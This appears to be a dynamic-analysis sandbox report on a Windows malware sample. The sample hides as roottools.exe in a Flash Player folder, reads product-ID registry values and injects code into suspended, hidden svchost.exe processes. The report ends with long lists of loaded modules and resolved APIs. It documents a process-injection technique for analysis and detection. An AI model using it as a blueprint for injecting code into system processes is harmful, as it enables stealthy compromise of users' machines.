gdi32.dll	0x75130000	0x751bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75250000	0x75295fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x752a0000	0x7534bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x75350000	0x75444fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75450000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x755b0000	0x7564cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x756e0000	0x7577ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75780000	0x75789fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75790000	0x7588ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x75890000	0x758c4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x758d0000	0x759ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759f0000	0x75afffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75b00000	0x75bcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75c50000	0x76899fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x76b60000	0x76beefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76c40000	0x76d75fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76d80000	0x76e6ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076e70000	0x76e70000	0x76f69fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000076f70000	0x76f70000	0x7708efff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x77240000	0x77245fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77270000	0x773effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Host Behavior

File (10)

Operation	Filename	Additional Information	Count	Logfile
Create	\??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	desired_access = FILE_READ_EA, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Get Info	STD_INPUT_HANDLE	type = file_type	1	Fn
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Get Info	STD_ERROR_HANDLE	type = file_type	1	Fn
Get Info	\??\C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	type = extended	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	type = size, size_out = 0	1	Fn
Open	STD_INPUT_HANDLE	-	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn

Registry (8)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	-	2	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion	value_name = DigitalProductId	1	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_NONE	1	Fn

Process (2)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Windows\SysWOW64\svchost.exe -k netsvcs	os_pid = 0x634, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE		1	Fn
Create	C:\Windows\SysWOW64\svchost.exe -k netsvcs	os_pid = 0x5fc, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE		1	Fn

Thread (2)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Windows\SysWOW64\svchost.exe -k netsvcs	proc_address = 0xb95bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY		1	Fn
Create	C:\Windows\SysWOW64\svchost.exe -k netsvcs	proc_address = 0x795bc, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY		1	Fn

Memory (10)

Operation	Process	Additional Information	Count	Logfile
Allocate	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0xb0000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688	1	Fn
Allocate	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x70000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688	1	Fn
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0xb0000, size = 114688	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0xc76c4, size = 4	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0xc77d0, size = 4	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0xc7d38, size = 4	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x70000, size = 114688	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x876c4, size = 4	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x877d0, size = 4	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe -k netsvcs	address = 0x87d38, size = 4	1	Fn Data

Module (567)

Operation	Module	Additional Information	Count	Logfile
Load	OLEAUT32.DLL	base_address = 0x76b60000	1	Fn
Load	SXS.DLL	base_address = 0x74940000	1	Fn
Load	KERNEL32	base_address = 0x759f0000	1	Fn
Load	kernel32	base_address = 0x759f0000	15	Fn
Load	shell32	base_address = 0x75c50000	2	Fn
Load	NTDLL	base_address = 0x77270000	1	Fn
Load	user32	base_address = 0x75790000	3	Fn
Load	ntdll	base_address = 0x77270000	2	Fn
Load	IPHlpApi	base_address = 0x74920000	1	Fn
Load	User32	base_address = 0x75790000	1	Fn
Load	KERNEL32.dll	base_address = 0x759f0000	101	Fn
Load	USER32.dll	base_address = 0x75790000	19	Fn
Load	CRYPT32.dll	base_address = 0x758d0000	2	Fn
Load	ADVAPI32.dll	base_address = 0x756e0000	39	Fn
Load	SHELL32.dll	base_address = 0x75c50000	3	Fn
Load	SHLWAPI.dll	base_address = 0x750d0000	20	Fn
Load	PSAPI.DLL	base_address = 0x74eb0000	1	Fn
Load	ole32.dll	base_address = 0x75450000	6	Fn
Load	GDI32.dll	base_address = 0x75130000	8	Fn
Load	WININET.dll	base_address = 0x75350000	10	Fn
Load	urlmon.dll	base_address = 0x76c40000	1	Fn
Load	OLEAUT32.dll	base_address = 0x76b60000	1	Fn
Load	Secur32.dll	base_address = 0x748e0000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x759f0000	2	Fn
Get Handle	c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	base_address = 0x400000	2	Fn
Get Handle	c:\windows\syswow64\oleaut32.dll	base_address = 0x76b60000	1	Fn
Get Handle	c:\windows\syswow64\ole32.dll	base_address = 0x75450000	1	Fn
Get Handle	c:\windows\syswow64\user32.dll	base_address = 0x75790000	1	Fn
Get Handle	c:\windows\syswow64\ntdll.dll	base_address = 0x77270000	1	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260	3	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260	3	Fn
Get Filename	c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260	1	Fn
Get Filename	-	process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsTNT, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x75a05235	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = OleLoadPictureEx, address_out = 0x76bc70a1	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = DispCallFunc, address_out = 0x76b73dcf	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = LoadTypeLibEx, address_out = 0x76b707b7	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = UnRegisterTypeLib, address_out = 0x76b91ca9	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = CreateTypeLib2, address_out = 0x76b78e70	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDateFromUdate, address_out = 0x76b77684	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarUdateFromDate, address_out = 0x76b7cc98	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = GetAltMonthNames, address_out = 0x76ba903a	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNumFromParseNum, address_out = 0x76b76231	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarParseNumFromStr, address_out = 0x76b75fea	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromR4, address_out = 0x76b83f94	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromR8, address_out = 0x76b84e9e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromDate, address_out = 0x76badb72	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromI4, address_out = 0x76b92a8c	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecFromCy, address_out = 0x76bad737	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarR4FromDec, address_out = 0x76bae015	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = GetRecordInfoFromTypeInfo, address_out = 0x76bacc3d	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = GetRecordInfoFromGuids, address_out = 0x76bad1c4	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayGetRecordInfo, address_out = 0x76bad48c	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArraySetRecordInfo, address_out = 0x76bad4c6	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayGetIID, address_out = 0x76bad509	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArraySetIID, address_out = 0x76b7e7bb	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayCopyData, address_out = 0x76b7e496	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayAllocDescriptorEx, address_out = 0x76b7ddf1	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayCreateEx, address_out = 0x76bad53f	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormat, address_out = 0x76bb2055	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatDateTime, address_out = 0x76bb20ea	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatNumber, address_out = 0x76bb2151	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatPercent, address_out = 0x76bb21f5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFormatCurrency, address_out = 0x76bb2288	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarWeekdayName, address_out = 0x76bb2335	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMonthName, address_out = 0x76bb23d5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAdd, address_out = 0x76b85934	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAnd, address_out = 0x76b85a98	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCat, address_out = 0x76b859b4	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDiv, address_out = 0x76bde405	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarEqv, address_out = 0x76bdef07	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarIdiv, address_out = 0x76bdf00a	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarImp, address_out = 0x76bdef47	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMod, address_out = 0x76bdf15e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMul, address_out = 0x76bddbd4	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarOr, address_out = 0x76bdecfa	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarPow, address_out = 0x76bdea66	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarSub, address_out = 0x76bdd332	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarXor, address_out = 0x76bdee2e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAbs, address_out = 0x76bdca11	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarFix, address_out = 0x76bdcc5f	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarInt, address_out = 0x76bdcde7	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNeg, address_out = 0x76bdc802	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNot, address_out = 0x76bdec66	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarRound, address_out = 0x76bdd155	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCmp, address_out = 0x76b7b0dc	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecAdd, address_out = 0x76b95f3e	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDecCmp, address_out = 0x76b84fd0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrCat, address_out = 0x76b80d2c	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCyMulI4, address_out = 0x76b959ed	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrCmp, address_out = 0x76b6f8b8	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstanceEx, address_out = 0x75499d4e	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CLSIDFromProgIDEx, address_out = 0x75460782	1	Fn
Get Address	c:\windows\syswow64\sxs.dll	function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x74987685	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetSystemMetrics, address_out = 0x757a7d2f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MonitorFromWindow, address_out = 0x757b3150	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MonitorFromRect, address_out = 0x757ce7a0	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MonitorFromPoint, address_out = 0x757b5281	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EnumDisplayMonitors, address_out = 0x757b451a	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMonitorInfoA, address_out = 0x757b4413	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadProcessMemory, address_out = 0x75a1cfcc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumResourceTypesA, address_out = 0x75a80efd	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = Shell_NotifyIconA, address_out = 0x75e98af2	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = ZwSetInformationProcess, address_out = 0x7728fb18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x75a010ff	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetDesktopWindow, address_out = 0x757b0a19	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x7729e026	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x75a011a9	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x75a01b00	2	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtYieldExecution, address_out = 0x7728ff2c	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtProtectVirtualMemory, address_out = 0x77290028	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x75a053c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x75a01282	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x75a01410	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x75a03ed3	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSize, address_out = 0x75a0196e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnmapViewOfFile, address_out = 0x75a01826	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtectEx, address_out = 0x75a845bf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLongPathNameA, address_out = 0x75a8437f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x75a1d802	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x74929263	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAllocEx, address_out = 0x75a1d9b0	2	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x75e97078	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EnumWindows, address_out = 0x757ad1cf	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x757a9a55	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EnumThreadWindows, address_out = 0x757b3961	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateThread, address_out = 0x75a07a2f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x75a049d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x75a089b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x772b1f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetNativeSystemInfo, address_out = 0x75a110b5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x75a034d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapDestroy, address_out = 0x75a035b7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x75a02d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x772a45f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x75a0dd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x75a014e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SystemTimeToFileTime, address_out = 0x75a05a7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalMemoryStatusEx, address_out = 0x75a2d4c4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x75a0103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x75a0170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedIncrement, address_out = 0x75a01400	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTime, address_out = 0x75a05a96	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFreeEx, address_out = 0x75a1d9c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsBadReadPtr, address_out = 0x75a2d075	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiW, address_out = 0x75a1d5cd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenMutexW, address_out = 0x75a05151	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x75a1ce2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x75a017ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x75a0469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveVectoredExceptionHandler, address_out = 0x772e5f41	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x75a01809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExW, address_out = 0x75a01ae5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DuplicateHandle, address_out = 0x75a01886	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleA, address_out = 0x75a01245	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AddVectoredExceptionHandler, address_out = 0x772e742b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x75a07a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x75a011f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x75a2830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiA, address_out = 0x75a03e8e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsWow64Process, address_out = 0x75a0195e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstChangeNotificationW, address_out = 0x75a1d851	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextChangeNotification, address_out = 0x75a25c1e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessInJob, address_out = 0x75a2c7ea	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateRemoteThread, address_out = 0x75a8416b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateNamedPipeW, address_out = 0x75a8414b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DisconnectNamedPipe, address_out = 0x75a841df	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ConnectNamedPipe, address_out = 0x75a840fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x75a05371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeW, address_out = 0x75a0418b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultUILanguage, address_out = 0x75a044ab	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x75a23b92	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableW, address_out = 0x75a01b48	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x75a017d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSection, address_out = 0x772a2c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x75a0465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x75a0192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x75a1d4f7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeNameForVolumeMountPointW, address_out = 0x75a1052f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x75a01986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileTime, address_out = 0x75a04407	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReleaseMutex, address_out = 0x75a0111e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77292270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x75a04950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileTime, address_out = 0x75a1ecbb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RemoveDirectoryW, address_out = 0x75a844cf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x75a01856	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExpandEnvironmentStringsW, address_out = 0x75a04173	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x75a054ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x772922b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesW, address_out = 0x75a01b18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x75a04442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenEventW, address_out = 0x75a015d6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTempPathW, address_out = 0x75a1d4dc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x75a014c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapCreate, address_out = 0x75a04a2d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteProcessMemory, address_out = 0x75a1d9e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x75a059e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x75a04435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InterlockedExchange, address_out = 0x75a01462	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVolumeInformationW, address_out = 0x75a1c860	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x75a04259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x75a034c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x75a034b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x75a01222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x75a0492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x75a28baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x75a2896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x75a011c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x75a2735f	1	Fn
